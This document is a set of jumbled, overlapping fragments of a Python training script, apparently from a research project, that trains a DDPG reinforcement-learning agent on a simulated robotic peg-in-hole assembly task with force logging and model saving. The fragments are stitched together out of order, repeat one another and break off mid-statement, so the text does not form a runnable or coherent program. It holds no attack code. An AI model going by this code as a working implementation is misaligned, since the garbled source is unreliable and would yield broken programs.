agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() -", "the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render,", "env # # if pull_safe is False: # logger.info('Peg-in-hole assembly failed for the", "# # print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch == 0 and", "is False and info: # pull_done, pull_safe = env.step_up() #Simulation env # pull_done,", "[] epoch_qs = [] Force_moments = [] epoch_episodes = 0 Long_term_reward = -", "1 and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout +", "assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done = False", "rank == 0: # saver = tf.train.Saver() # else: # saver = None", "nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train", "for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank", "str(max(abs(new_obs[3:6])))) episode_reward += r delta = r - Long_term_reward # if memory.nb_entries >=", "baselines.common.tf_util as U import tensorflow as tf from mpi4py import MPI import numpy", "= mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\" saver.save(sess, model_directory", "header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key,", "combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] =", "= new_obs \"\"\"Episode done and start pull the pegs step by step\"\"\" if", "param noise, if necessary\"\"\" if memory.nb_entries >= batch_size and param_noise is not None:", "Author : <NAME> date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*-", "import mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as U import tensorflow as tf", "time from collections import deque import pickle import sys from baselines import logger", "mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward),", "sess: \"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess)", "= [] epoch_actions = [] epoch_qs = [] Force_moments = [] epoch_episodes =", "key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank ==", "combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\" saver.save(sess,", "'/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size,", "eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if", "- Long_term_reward # if memory.nb_entries >= batch_size and param_noise is not None: #", "for the exceed force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward)", "for nb_train_steps times\"\"\" for t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl)", "nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action,", "epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats =", "if env.robot_control.CalibFCforce() is False: # exit() delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time", "the pegs step by step\"\"\" if info is False: logger.info('Peg-in-hole assembly failed for", "with the following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging stuff only", "= mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\" saver.save(sess, model_directory + 'simulation_model') #", "actor_lr / delay_rate epoch_critic_lr = critic_lr / delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment", "memory.nb_entries >= batch_size and param_noise is not None: # agent.feed_back_explore(delta) Number_episodes = gamma", "forcement = [] Last_average_reward = 0. Number_episodes = 0. for t_rollout in range(nb_rollout_steps):", "done, info, expert_action = env.step(action, t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action,", "expert_action = env.step(action, t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The", "mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as U import tensorflow as tf from", "tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() #", "agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot the", "deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for t_train in range(nb_train_steps): cl, al", "t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert", "compute the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history))", "total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] =", "for the exceed force!!!') # exit() break \"\"\"Episode failed and start pull the", "as tf from mpi4py import MPI import numpy as np import pandas as", "agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration =", "# saver = None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session()", "None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses),", "nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2,", "= [] epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs = [] Force_moments =", "failed for the exceed force!!!') # pull_done = False # while pull_done is", "Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if epoch == nb_epoch_cycles - 1 and", "# pull_done, pull_safe = env.step_up() # pull_done, pull_safe = env.pull_up() # True env", "pull_safe = env.pull_up() # True env # # if pull_safe is False: #", "forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch == 0", "and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1)", "gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank =", "agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for exceed steps!!!')", "env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs = new_obs", "the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes']", "# re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\",", "normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent", "= mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses)", "tf.train.Saver() \"\"\"Set up logging stuff only for a single worker\"\"\" # if rank", "= [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr =", "[] epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs = [] Force_moments = []", "File Name: Simulate_main Description : Author : <NAME> date: 18-1-12 ------------------------------------------------- Change Activity:", "utf-8 -*- import os import time from collections import deque import pickle import", "= - 0.10 for epoch in range(nb_epochs): \"\"\"Show the result for cycle 20", "forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if epoch == nb_epoch_cycles - 1", "re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',',", "for epoch in range(nb_epochs): \"\"\"Show the result for cycle 20 times and Save", "= mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the", "env.step(action, t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\"", "as U import tensorflow as tf from mpi4py import MPI import numpy as", "normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory,", "combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and", "# env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs =", "= pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir", "[] epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions = []", "logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging stuff only for a single worker\"\"\"", "np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by {} before executing in", "import tensorflow as tf from mpi4py import MPI import numpy as np import", "epoch == 0 and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout +", "in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the mean of the total", "if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 #", "necessary\"\"\" if memory.nb_entries >= batch_size and param_noise is not None: distance = agent.adapt_param_noise()", "False: # logger.info('Peg-in-hole assembly failed for the exceed force!!!') # exit() break Long_term_reward", "\"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0 # episodes = 0 # t", "not None: # agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward = r +", "\"\"\"Episode failed and start pull the pegs step by step\"\"\" if info is", "q_value = 0. done = False forcement = [] Last_average_reward = 0. Number_episodes", "the following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging stuff only for", "if eval_env and hasattr(eval_env, 'get_state'): with open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb') as f: pickle.dump(eval_env.get_state(), f)", "action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the", "if epoch == 0 and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout", "-*- \"\"\" ------------------------------------------------- File Name: Simulate_main Description : Author : <NAME> date: 18-1-12", "== 0: # saver = tf.train.Saver() # else: # saver = None #", "pull_done, pull_safe = env.pull_up() # True env # # if pull_safe is False:", "= np.power(10, 1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps =", "= [] epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions =", "following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging stuff only for a", "0 and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if", "actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following configuration:') logger.info(str(agent.__dict__.items()))", ": <NAME> date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding:", "sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) #", "= 0. for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q = agent.pi(obs,", "Name: Simulate_main Description : Author : <NAME> date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12", "= mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] =", "'simulation_forcement', sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False)", "sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir()", "deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory +", "param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following", "memory.nb_entries >= batch_size and param_noise is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write", "else: # saver = None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with", "new_obs \"\"\"Episode done and start pull the pegs step by step\"\"\" if done:", "combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean']", "the result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',',", "'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments)", "cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\"", "= env.pull_up() #True env # # if pull_safe is False: # logger.info('Pull up", ": Author : <NAME> date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" #", "import numpy as np import pandas as pd \"\"\"First the path should be", "model\"\"\" epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr =", "utf-8 -*- \"\"\" ------------------------------------------------- File Name: Simulate_main Description : Author : <NAME> date:", "= [] Force_moments = [] epoch_episodes = 0 Long_term_reward = - 0.10 for", "# True env # # if pull_safe is False: # logger.info('Peg-in-hole assembly failed", "Reset\"\"\" agent.reset() # episode_step = 0 # episodes = 0 # t =", "is False: # logger.info('Peg-in-hole assembly failed for the exceed force!!!') # exit() break", "popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank", "== 0 and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1)", "sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()):", "Description : Author : <NAME> date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\"", "range(nb_epochs): \"\"\"Show the result for cycle 20 times and Save the model\"\"\" epoch_actor_losses", "the exceed force!!!') # pull_done = False # while pull_done is False and", "param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps,", "pd \"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval,", "normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using", "header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) # re_steps", "in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs = env.reset() episode_reward = 0. episode_discount_reward", "is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\"", "# min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by {}", "\"\"\"scale for execution in env\"\"\" new_obs, r, done, info, expert_action = env.step(action, t_rollout)", "/ nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps = [] epoch_adaptive_distances =", "epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration", "result for cycle 20 times and Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses", "= 0 # t = 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False:", "and param_noise is not None: # agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward", "# else: # saver = None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100)", "#True env # # if pull_safe is False: # logger.info('Pull up the pegs", "-0.2, -0.2, -0.2]) logger.info('scaling actions by {} before executing in env'.format(max_action)) model_directory =", "should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor,", "pull_done, pull_safe = env.step_up() # pull_done, pull_safe = env.pull_up() # True env #", "open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'): with", "from util import mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as U import tensorflow", "[] epoch_actions = [] epoch_qs = [] Force_moments = [] epoch_episodes = 0", "epoch_actions = [] epoch_qs = [] Force_moments = [] epoch_episodes = 0 Long_term_reward", "is False and info: # pull_done, pull_safe = env.step_up() # pull_done, pull_safe =", "[] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr = critic_lr", "mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor']", "= pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement',", "action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value +=", "coding: utf-8 -*- import os import time from collections import deque import pickle", "== 0 and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f:", "= [] epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward =", "info: # pull_done, pull_safe = env.step_up() #Simulation env # pull_done, pull_safe = env.pull_up()", "the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps),", "clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver()", "before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim,", "q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value += q \"\"\"scale", "cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if epoch ==", "env.plot_force(forcement, t_rollout + 1) if epoch == nb_epoch_cycles - 1 and cycle ==", "times\"\"\" for t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net()", "mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions)", "+= 1 # pull_done = False # while pull_done is False and info:", "mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats = agent.get_stats() combined_stats", "if rank == 0 and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb')", "== nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs,", "in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise,", "clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank()", "+ gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" # if render: # forcement.append(new_obs[0:6]) #", "eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2,", "summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes)", "in env\"\"\" new_obs, r, done, info, expert_action = env.step(action, t_rollout) episode_discount_reward += gamma", "\"\"\"Plot the force and moments\"\"\" # if render: # forcement.append(new_obs[0:6]) # # print(forcement)", "action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value += q", "= mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances)", "/ delay_rate epoch_critic_lr = critic_lr / delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment reset", "False: # exit() delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards", "True env # # if pull_safe is False: # logger.info('Peg-in-hole assembly failed for", "= np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) # min_action = np.array([-0.2, -0.2, -0.2,", "assembly failed for exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\"", "max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) # min_action = np.array([-0.2, -0.2,", "pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'): with open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb') as f:", "+= q \"\"\"scale for execution in env\"\"\" new_obs, r, done, info, expert_action =", "= [] Last_average_reward = 0. Number_episodes = 0. for t_rollout in range(nb_rollout_steps): \"\"\"Predict", "# pull_done, pull_safe = env.pull_up() # True env # # if pull_safe is", "epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done = False # while", "epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for exceed", "and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if epoch", "distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes)", "MPI import numpy as np import pandas as pd \"\"\"First the path should", "critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps,", "saver = None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as", "start pull the pegs step by step\"\"\" if info is False: logger.info('Peg-in-hole assembly", "in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank == 0", "env.pull_up() #True env # # if pull_safe is False: # logger.info('Pull up the", "render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm,", "0. for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q = agent.pi(obs, apply_noise=True,", "env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau,", "pull_safe is False: # logger.info('Pull up the pegs failed for the exceed force!!!')", "\"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr = critic_lr /", "up logging stuff only for 